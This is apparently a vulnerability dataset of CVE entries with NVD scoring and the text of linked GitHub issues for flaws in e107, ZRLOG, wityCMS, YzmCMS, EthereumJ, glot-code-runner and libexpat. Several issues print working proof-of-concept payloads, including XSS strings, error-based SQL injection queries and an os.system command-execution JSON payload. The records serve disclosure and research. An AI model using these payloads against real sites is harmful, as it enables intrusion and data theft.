428
CVE-2018-17423
2019-06-19T17:15:10.827
An issue was discovered in e107 v2.1.9. There is a XSS attack on e107_admin/comment.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kiss-sh0t/e107_v2.1.9_XSS_poc" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3414" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kiss-sh0t/e107_v2.1.9_XSS_poc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3414" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:e107:e107:2.1.9:*:*:*:*:*:*:*", "matchCriteriaId": "B2D5032E-949D-493D-97D9-51ED1A990D98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/e107inc/e107/issues/3414
[ "Third Party Advisory" ]
github.com
[ "e107inc", "e107" ]
(removed)
(removed)
https://api.github.com/repos/e107inc/e107/issues/3414/comments
4
2018-09-03T02:35:20Z
2021-09-06T18:40:34Z
https://github.com/e107inc/e107/issues/3414
356,340,540
3,414
429
CVE-2018-17079
2019-06-19T18:15:10.963
An issue was discovered in ZRLOG 2.0.1. There is a Stored XSS vulnerability in the nickname field of the comment area.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/38" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "CDB89DE9-6695-48D7-9A0B-0207EAAAAD9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/94fzb/zrlog/issues/38
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
Comment area does not do input filtering Poc `</p><img%20src=1%20onerror=alert(1)><p>`
There is a stored XSS in the article review area
https://api.github.com/repos/94fzb/zrlog/issues/38/comments
10
2018-09-18T15:55:09Z
2019-10-24T13:20:28Z
https://github.com/94fzb/zrlog/issues/38
361,373,310
38
430
CVE-2018-16250
2019-06-20T14:15:10.687
The "utilisateur" menu in Creatiwity wityCMS 0.6.2 modifies the presence of XSS at two input points for user information, with the "first name" and "last name" parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/156" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/156" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creatiwity:witycms:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "F3E492B9-5B53-4042-8557-CA20E088491C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Creatiwity/wityCMS/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Creatiwity", "wityCMS" ]
The "utilisateur" menu on the WityCMS 0.6.2 site modifies the presence of XSS at two input points for user information, with the parameters "first name" and "last name". payload: " onclick="alert(document.cookie)" " onclick="alert(document.cookie)" Javascript gets executed. Here's an output of the mentioned payload when entered and saved. ![default](https://user-images.githubusercontent.com/33438164/44775386-0dd94b80-aba8-11e8-88d4-73ff63d74a3d.png) Payload data are submitted to apps/user/admin/view.php ![default](https://user-images.githubusercontent.com/33438164/44775427-26e1fc80-aba8-11e8-900f-3e44327757f5.png) When users want to change their names, clicking the input box triggers the code. ![default](https://user-images.githubusercontent.com/33438164/44776163-03b84c80-abaa-11e8-8dbc-1f7a5c5c4144.png) ![default](https://user-images.githubusercontent.com/33438164/44776176-0a46c400-abaa-11e8-8245-9bfa3f23475e.png) ![default](https://user-images.githubusercontent.com/33438164/44776278-5265e680-abaa-11e8-8c4d-5858132aed99.png)
Persistent XSS
https://api.github.com/repos/Creatiwity/wityCMS/issues/156/comments
0
2018-08-29T08:41:37Z
2018-08-29T08:41:37Z
https://github.com/Creatiwity/wityCMS/issues/156
355,056,617
156
431
CVE-2018-16251
2019-06-20T14:15:10.750
A "search for user discovery" injection issue exists in Creatiwity wityCMS 0.6.2 via the "Utilisateur" menu. No input parameters are filtered, e.g., the /admin/user/users Nickname, email, firstname, lastname, and groupe parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/157" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/157" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creatiwity:witycms:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "F3E492B9-5B53-4042-8557-CA20E088491C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Creatiwity/wityCMS/issues/157
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Creatiwity", "wityCMS" ]
Search for user discovery injection under the witycms 0.6.2 "Utilisateur" menu. No input parameters were filtered. /admin/user/users? Nickname=1&amp;email=&amp;firstname=&amp;lastname=&amp;groupe= payload: firstname=' AND (SELECT 6463 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(6463=6463,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP&lastname=&nickname=root&email=&groupe= lastname=' AND (SELECT 2839 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2839=2839,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oNFP&nickname=root&email=&groupe= Defective pages and addresses ![default](https://user-images.githubusercontent.com/33438164/44779792-023f5200-abb3-11e8-9462-648d4b7437e8.png) http://127.0.0.1/witycms/admin/user/users?nickname=roott%27+AND+%28SELECT+9674+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x71717a6271%2C%28SELECT+%28ELT%289674%3D9674%2C1%29%29%29%2C0x7178627871%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+YoTG&email=&firstname=&lastname=&groupe= Attack through sqlmap, find database name and database type. ![default](https://user-images.githubusercontent.com/33438164/44779923-50ecec00-abb3-11e8-905c-6cd4614c2a2d.png) ![default](https://user-images.githubusercontent.com/33438164/44779956-63ffbc00-abb3-11e8-8fa8-1d8878da5c15.png) A page executed by background code. ![default](https://user-images.githubusercontent.com/33438164/44780020-8b568900-abb3-11e8-8c7c-36e189ac206a.png) \apps\user\front\model.php ——中科卓信软件测评技术中心
Find a SQL injection
https://api.github.com/repos/Creatiwity/wityCMS/issues/157/comments
3
2018-08-29T09:47:35Z
2018-11-18T06:12:32Z
https://github.com/Creatiwity/wityCMS/issues/157
355,081,811
157
432
CVE-2018-16247
2019-06-20T16:15:11.087
YzmCMS 5.1 has XSS via the admin/system_manage/user_config_add.html title parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "0A656260-E114-4D4D-A5E7-E56F6B97245C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html XSS, payload :<script>alert(1);</script> POC: POST /yzmcms/admin/system_manage/user_config_add.html HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 67 Cookie: joomla_remember_me_c40951350a7b1d9e2f1f81bd68d4c7af=yDotjSEyelPNb7k2.SOiDnuEJcliS7ROVynsH; iCMS_USER_AUTH=ea3c82fdxtNpijGe2IcYUlDjKfAAXlWqnxWAp7EojSadbYwHa%252Bh3Zq7%252BjCfDqMKPx6pkNpj3ZZT92FQuoAyytZfdEbYtT1A34Gne45d1INF5iaFBjIuVIWDHBGQOgw4IGmsPnt5i5%252BmnAvgfU4L3K0orglxQZCniWdUDVNOI%252BCJ29iJAExa2971EW14stwOFgWpU8%252BDTRj2RBu0dYPKIfSAKSW7RAKXO%252FUey1bqkg2V9hcb1gr4bUZhW2Zri3MuvJHdG6PLowrW77vi%252FoiaT6keckp7NNtr%252B1rr89QNrGyMk0AGNWZBUZdiD3BWuRSb8SKeUqVkkSCR%252B4Nb8tx1Nt0cmy%252F5QoZI3zDDRO8lQtpsGvyXIQdEPozb3eoBpLQijBAH%252BSrJodfsx8It3Sx%252FifTTVjKoLaieUNJVp%252B1HWBSbp%252BdeDefD8lKlayAlNoUe6L8v25JgkYFQJk9ty6plHu9KMxnk5ez9K%252BJX94d34X0d9uNSl16evfTh7ChrQNVlGiI5Xr7Yzwljydw7GbFYMuJhva%252BtfsTM; iCMS_userid=ae106e82Um%252F8Sl5cXKohwNL7HAT%252BJ8wbzRQrQxqC7ED5A4UZuw; iCMS_nickname=95d20a9ecX5js7g1ZjSe%252BO2PfWuvEpHcyf48apmBlHwSdCYM; iCMS_article_category_tabs=tree; bdshare_firstime=1534386202388; iCMS_redirect_num=1; 4a6f86430a9361b19459111df44aa326=aq59ps9ldq5c7598mm3lvcgdu0; joomla_user_state=logged_in; 12abbf4bf5e97f8392f838840fa944c4=74c507ed3havfnb90ts30iqlm3; iCMS_iCMS_AUTH=440aab71gT2MFtBaHQPwHaJS37c4iboInDqYaXOVjDSZkAHQHUM%252FvSDaZZV2tJKP%252ByH6FOQF7EtDBwXRZWs1h82dc11QZVBKHEz%252FB6E5tVplvHn4ARKu; PHPSESSID=f9trn71r781tg75v2fpqi9uel6; yzmphp_adminid=57c4QWyUo5m6tWVXPMc6uWaZHWa2O_83YBC3hx7W; yzmphp_adminname=dfd3xEcjriOWbvrIYHMl0gTppKSR0jGTHCnGQdsl9yuF Connection: close name=1&fieldtype=textarea&value=test&title=<script>alert(1);</script>&status=1&dosubmit=1 ![_20180816131313](https://user-images.githubusercontent.com/33438164/44189855-d2c22b80-a156-11e8-9822-5c3c141061b6.png) ![_20180816131333](https://user-images.githubusercontent.com/33438164/44189858-d48bef00-a156-11e8-9f7c-eb2476e2c3e6.png) ——中科卓信软件测评技术中心
yzmcms v5.1 XSS
https://api.github.com/repos/yzmcms/yzmcms/issues/3/comments
1
2018-08-16T05:18:39Z
2020-01-02T07:59:45Z
https://github.com/yzmcms/yzmcms/issues/3
351,058,717
3
433
CVE-2018-15890
2019-06-20T17:15:09.800
An issue was discovered in EthereumJ 1.8.2. There is Unsafe Deserialization in ois.readObject in mine/Ethash.java and decoder.readObject in crypto/ECKey.java. When a node syncs and mines a new block, arbitrary OS commands can be run on the server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/ethereum/ethereumj" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ethereum/ethereumj/issues/1161" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/frohoff/ysoserial/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/ethereum/ethereumj" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ethereum/ethereumj/issues/1161" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/frohoff/ysoserial/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ethereum:ethereumj:1.8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BABD94AC-7FC3-45D9-8189-997AC3AC011E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/ethereum/ethereumj/issues/1161
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ethereum", "ethereumj" ]
### What's wrong Ethash class uses pure Java object serialization to store light and full datasets. As @ThingToNO pointed out, this serialization in its pure form can be exploited, additional information can be found [here](https://github.com/frohoff/ysoserial/). However, in this particular case it doesn't look valuable for attacker. ### How to fix Looks like the easiest way is to use custom serialization.
Unsafe Java object serialization
https://api.github.com/repos/ethereum/ethereumj/issues/1161/comments
4
2018-08-20T14:48:16Z
2019-07-18T15:27:18Z
https://github.com/ethereum/ethereumj/issues/1161
352,169,268
1,161
434
CVE-2018-15747
2019-06-21T14:15:10.693
The default configuration of glot-www through 2018-05-19 allows remote attackers to execute arbitrary code because glot-code-runner supports os.system within a "python" "files" "content" JSON file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prasmussen/glot-code-runner/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prasmussen/glot-code-runner/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:glot:glot-www:*:*:*:*:*:*:*:*", "matchCriteriaId": "17442B64-AF4C-4E2F-B502-DDE0ADF2B3AB", "versionEndExcluding": null, "versionEndIncluding": "2018-05-19", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/prasmussen/glot-code-runner/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "prasmussen", "glot-code-runner" ]
This program doesn't limit the execution of command, we can run arbitrarily command on this runner. payload: ``` { "language": "python", "files": [ { "name": "main.py", "content": "import os\nos.system('touch /tmp/pwned')" } ] } ``` output: ``` # ./runner { "language": "python", "files": [ { "name": "main.py", "content": "import os\nos.system('touch /tmp/pwned')" } ] } {"stdout":"","stderr":"","error":""} # ls |grep pwn pwned ``` If this program run on a website, it will cause remote command execution. For example ![image](https://user-images.githubusercontent.com/19611084/44516170-f0fbce80-a6f6-11e8-8d36-78d0939aba12.png)
Arbitrarily code execute
https://api.github.com/repos/prasmussen/glot-code-runner/issues/15/comments
1
2018-08-23T09:11:20Z
2018-08-25T15:49:59Z
https://github.com/prasmussen/glot-code-runner/issues/15
353,292,017
15
435
CVE-2018-20843
2019-06-24T17:15:09.980
In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while processing (enough to be usable for denial-of-service attacks).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00039.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5226" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/blob/R_2_2_7/expat/Changes" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/186" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/262" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/262/commits/11f8838bf99ea0a6f0b76f9760c43704d00c4ff6" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00028.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CEJJSQSG3KSUQY4FPVHZ7ZTT7FORMFVD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IDAUGEB3TUP6NEKJDBUBZX7N5OAUOOOK/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Jun/39" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/201911-08" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190703-0001/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K51011533" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4040-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4040-2/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4472" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2021-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00039.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/blob/R_2_2_7/expat/Changes" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party 